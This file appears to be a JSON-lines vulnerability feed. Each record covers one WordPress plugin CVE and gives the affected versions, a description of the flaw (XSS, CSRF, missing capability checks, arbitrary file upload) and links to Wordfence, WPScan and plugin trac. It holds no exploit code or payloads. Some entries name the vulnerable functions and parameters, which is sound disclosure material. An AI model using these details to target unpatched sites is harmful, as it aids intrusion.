{"CVE_ID":"CVE-2023-6783","slug":"wolfnet-idx-for-wordpress","versionImpact":"1.19.1","description":"The WolfNet IDX for WordPress plugin through 1.19.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5acd231b-4072-4ee1-9497-023465318608\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5acd231b-4072-4ee1-9497-023465318608\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1345","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the queue_posts function. This makes it possible for unauthenticated attackers to modify the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d16fa590-1409-4f04-b8b7-0cce17412a5f\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d16fa590-1409-4f04-b8b7-0cce17412a5f\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25139","slug":"responsive-coming-soon","description":"The Coming Soon Page & Maintenance Mode plugin for WordPress is vulnerable to unauthenticated settings reset in versions up to, and including 1.8.1 due to missing capability checks in the ~\/functions\/data-reset-post.php file which makes it possible for unauthenticated attackers to trigger a plugin settings reset.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61fdc6e9-75ea-4226-9527-a5fd02efde70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61fdc6e9-75ea-4226-9527-a5fd02efde70?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-in-wordpress-coming-soon-page-and-maintenance-mode-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-in-wordpress-coming-soon-page-and-maintenance-mode-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2123149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2123149\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2121321\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2121321\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4703","slug":"all-in-one-b2b-for-woocommerce","versionImpact":"1.0.3","description":"The All in One B2B for WooCommerce WordPress plugin through 1.0.3 does not properly validate parameters when updating user details, allowing an unauthenticated attacker to update the details of any user. Updating the password of an Admin user leads to privilege escalation.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83278bbb-90e6-4465-a46d-60b4c703c11a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83278bbb-90e6-4465-a46d-60b4c703c11a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0903","slug":"userfeedback-lite","versionImpact":"1.0.13","description":"The User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_submitted' 'link' value in all versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in the feedback submission page that will execute when a user clicks the link, while also pressing the command key.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a649fbea-65cf-45c9-b853-2733f27518af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a649fbea-65cf-45c9-b853-2733f27518af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1996","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's IHover widget link in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48fa5f3b-000b-406e-b7ee-51af5720cf72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48fa5f3b-000b-406e-b7ee-51af5720cf72?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3822","slug":"base64-encoderdecoder","versionImpact":"0.9.2","description":"The Base64 Encoder\/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff5411b1-9e04-4e72-a502-e431d774642a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff5411b1-9e04-4e72-a502-e431d774642a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4663","slug":"osm-map-elementor","versionImpact":"1.2.2","description":"The OSM Map Widget for Elementor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/402d0399-bc48-4740-86a4-8bf3424fb035?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/402d0399-bc48-4740-86a4-8bf3424fb035?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm-map-elementor\\\/trunk\\\/osm-map.php#L1478\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm-map-elementor\\\/trunk\\\/osm-map.php#L1478\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11225","slug":"wpdm-premium-packages","versionImpact":"5.9.3","description":"The Premium Packages \u2013 Sell Digital Products Securely plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.9.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L420\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L420\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L422\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L584\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L584\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdm-premium-packages\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdm-premium-packages\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2e847fd-0932-4d65-a201-b86e39a33588?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2e847fd-0932-4d65-a201-b86e39a33588?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12616","slug":"wp-bitly","versionImpact":"2.7.3","description":"The Bitly&#039;s WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 2.7.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and retrieve plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bitly\\\/trunk\\\/includes\\\/class-wp-bitly-auth.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bitly\\\/trunk\\\/includes\\\/class-wp-bitly-auth.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1312c34-45c6-41e5-b6fc-a45ac2c8a0ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1312c34-45c6-41e5-b6fc-a45ac2c8a0ca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3921","slug":"peprodev-ups","description":"The PeproDev Ultimate Profile Solutions plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handel_ajax_req() function in versions 1.9.1 to 7.5.2. This makes it possible for unauthenticated attackers to update arbitrary user's metadata which can be leveraged to block an administrator from accessing their site when wp_capabilities is set to 0.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peprodev-ups\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peprodev-ups\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a881ca02-cef9-4f4b-8a62-e241c4c80004?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a881ca02-cef9-4f4b-8a62-e241c4c80004?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2016-15043","slug":"wp-mobile-detector\/changelog","versionImpact":"3.5","description":"The WP Mobile Detector plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in resize.php file in versions up to, and including, 3.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/aadityapurani.com\\\/2016\\\/06\\\/03\\\/mobile-detector-poc\\\/\",\"name\":\"https:\\\/\\\/aadityapurani.com\\\/2016\\\/06\\\/03\\\/mobile-detector-poc\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.sucuri.net\\\/2016\\\/06\\\/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html\",\"name\":\"https:\\\/\\\/blog.sucuri.net\\\/2016\\\/06\\\/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-mobile-detector\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-mobile-detector\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4739674-eed4-417e-8c4d-2f5351b057cf\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4739674-eed4-417e-8c4d-2f5351b057cf\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.pluginvulnerabilities.com\\\/2016\\\/05\\\/31\\\/aribitrary-file-upload-vulnerability-in-wp-mobile-detector\\\/\",\"name\":\"https:\\\/\\\/www.pluginvulnerabilities.com\\\/2016\\\/05\\\/31\\\/aribitrary-file-upload-vulnerability-in-wp-mobile-detector\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a5d5dbd-36f0-4886-adf8-045ec9c2e306?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a5d5dbd-36f0-4886-adf8-045ec9c2e306?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1344","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the uucss_update_rule function. This makes it possible for unauthenticated attackers to modify the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263153c9-61c5-4df4-803b-8d274e2a5e35\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263153c9-61c5-4df4-803b-8d274e2a5e35\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0894","slug":"restaurant-pickup-delivery-dine-in","versionImpact":"1.0.9","description":"The Pickup | Delivery | Dine-in date time WordPress plugin through 1.0.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d42eff41-096f-401d-bbfb-dcd6e08faca5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d42eff41-096f-401d-bbfb-dcd6e08faca5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25138","slug":"user-submitted-posts","versionImpact":"20190312.","description":"The User Submitted Posts plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the usp_check_images function in versions up to, and including, 20190312. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-submitted-posts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-submitted-posts\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a97877b-fb4d-4e87-bcff-56be65fee6ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a97877b-fb4d-4e87-bcff-56be65fee6ce?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/arbitrary-file-upload-vulnerability-in-wordpress-user-submitted-posts-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/arbitrary-file-upload-vulnerability-in-wordpress-user-submitted-posts-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1590","slug":"pagelayer","versionImpact":"1.8.2","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button Widget in all versions up to, and including, 1.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e635dfb3-002d-4197-b14a-0136a1990a75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e635dfb3-002d-4197-b14a-0136a1990a75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3039750%40pagelayer&new=3039750%40pagelayer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3039750%40pagelayer&new=3039750%40pagelayer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3749","slug":"sp-client-document-manager","versionImpact":"4.71","description":"The SP Project & Document Manager WordPress plugin through 4.71 lacks proper access controls and allows a logged-in user to view and download files belonging to another user.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d14bb16e-ce1d-4c31-8791-bc63174897c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d14bb16e-ce1d-4c31-8791-bc63174897c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4623","slug":"blogmentor","versionImpact":"1.5","description":"The Blogmentor \u2013 Blog Layouts for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018pagination_style\u2019 parameter in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0925ceb-581c-4748-abfb-9962e53b7db9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0925ceb-581c-4748-abfb-9962e53b7db9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blogmentor\\\/trunk\\\/includes\\\/elements\\\/blogmentor-blog-posts.php#L977\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blogmentor\\\/trunk\\\/includes\\\/elements\\\/blogmentor-blog-posts.php#L977\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7692","slug":"flaming-forms","versionImpact":"1.0.1","description":"The Flaming Forms WordPress plugin through 1.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e9f98ef-5a44-4a0c-b9cd-ce750bec74f9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e9f98ef-5a44-4a0c-b9cd-ce750bec74f9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9307","slug":"mfolio-lite","versionImpact":"1.2.1","description":"The mFolio Lite plugin for WordPress is vulnerable to file uploads due to a missing capability check in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file or upload arbitrary EXE files on the affected site's server which may make remote code execution possible if the attacker can also gain access to run the .exe file, or trick a site visitor into downloading and running the .exe file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b4012dd-7c0a-45f1-8ada-8f9dc6867e1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b4012dd-7c0a-45f1-8ada-8f9dc6867e1e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mfolio-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mfolio-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12605","slug":"ai-scribe-the-chatgpt-powered-seo-content-creation-wizard","versionImpact":"2.3","description":"The AI Scribe \u2013 SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3. This is due to missing or incorrect nonce validation on the \"al_scribe_content_data\" actions. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L713\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L713\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52a8718f-2c4d-4da1-a81f-e93dff3fa43b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52a8718f-2c4d-4da1-a81f-e93dff3fa43b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1233","slug":"lafka-plugin","versionImpact":"7.1.0","description":"The Lafka Plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'lafka_options_upload' AJAX function in all versions up to, and including, 7.1.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the theme option that overrides the site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/lafka-fast-food-restaurant-woocommerce-theme\\\/23969682\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/lafka-fast-food-restaurant-woocommerce-theme\\\/23969682\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/865b87a8-ab8a-4054-9e18-50693023cb96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/865b87a8-ab8a-4054-9e18-50693023cb96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3860","slug":"cardealerpress","versionImpact":"6.7.2504.00","description":"The CarDealerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018saleclass\u2019 parameter in all versions up to, and including, 6.7.2504.00 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cardealerpress\\\/tags\\\/6.7.2412.00\\\/templates\\\/shortcode\\\/sc_inventory_counter.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cardealerpress\\\/tags\\\/6.7.2412.00\\\/templates\\\/shortcode\\\/sc_inventory_counter.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cardealerpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cardealerpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6ad38a3-adb1-4c82-8e8c-f5883ba0f10e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6ad38a3-adb1-4c82-8e8c-f5883ba0f10e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4413","slug":"pixabay-images","versionImpact":"3.4","description":"The Pixabay Images plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the pixabay_upload function in all versions up to, and including, 3.4. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixabay-images\\\/trunk\\\/pixabay-images.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixabay-images\\\/trunk\\\/pixabay-images.php#L177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e71dea-d736-49c2-a630-f42905ac6b4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e71dea-d736-49c2-a630-f42905ac6b4d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
